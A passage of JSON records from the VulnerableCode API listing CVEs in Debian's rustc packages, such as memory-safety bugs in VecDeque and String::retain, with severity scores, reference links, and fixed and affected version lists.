], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2018-1000657" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ra1h-asnb-53eh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80738?format=api", "vulnerability_id": "VCID-wdu6-3vph-aqb7", "summary": "rust: use-after-free or double free in VecDeque::make_contiguous", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36318.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36318.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36318", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57759", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57834", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57833", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57851", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57843", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57863", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57838", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57893", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57894", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57911", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57887", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57867", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57896", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57895", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00356", "scoring_system": "epss", "scoring_elements": "0.57873", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36318" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36318", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36318" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949192", "reference_id": "1949192", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949192" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1804", "reference_id": "AVG-1804", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1804" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:1935", "reference_id": "RHSA-2021:1935", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:1935" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:2243", "reference_id": "RHSA-2021:2243", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:2243" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2020-36318" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wdu6-3vph-aqb7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80677?format=api", "vulnerability_id": "VCID-wpe1-jr23-duhh", "summary": "rust: optimization for joining strings can cause uninitialized bytes to be exposed", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36323.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36323.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36323", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72059", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72186", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72182", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72191", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72065", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72086", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72062", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72099", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72111", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72134", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72118", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72104", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72145", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72152", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72138", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36323" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36323", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36323" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950396", "reference_id": "1950396", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950396" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2020-36323" ], "risk_score": 3.7, "exploitability": "0.5", "weighted_severity": "7.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wpe1-jr23-duhh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80831?format=api", "vulnerability_id": "VCID-y25s-c64z-57a6", "summary": "rust: memory safety violation in String::retain()", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36317.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36317.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36317", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50792", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5083", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50862", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5087", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50847", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50873", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50831", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50888", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50886", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50928", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50907", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5089", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50934", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50914", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36317" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36317", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36317" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949189", "reference_id": "1949189", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949189" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1804", "reference_id": "AVG-1804", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1804" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:1935", "reference_id": "RHSA-2021:1935", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:1935" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:2243", "reference_id": "RHSA-2021:2243", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:2243" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2020-36317" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y25s-c64z-57a6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/83197?format=api", "vulnerability_id": "VCID-y2yd-nyfc-ckec", "summary": "rust: print of uninitialized memory in the debug trait implementation for std::collections::vec_deque::Iter", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-1010299.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-1010299.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-1010299", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.38862", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.38995", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.39014", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.38946", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.38998", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.39013", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.39026", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.38989", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.38962", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.39009", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.3899", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.38906", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.38743", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.38719", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00175", "scoring_system": "epss", "scoring_elements": "0.3863", "published_at": "2026-04-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-1010299" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010299", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010299" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1736766", "reference_id": "1736766", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1736766" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938933?format=api", "purl": "pkg:deb/debian/rustc@1.30.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.30.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2019-1010299" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y2yd-nyfc-ckec" } ], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }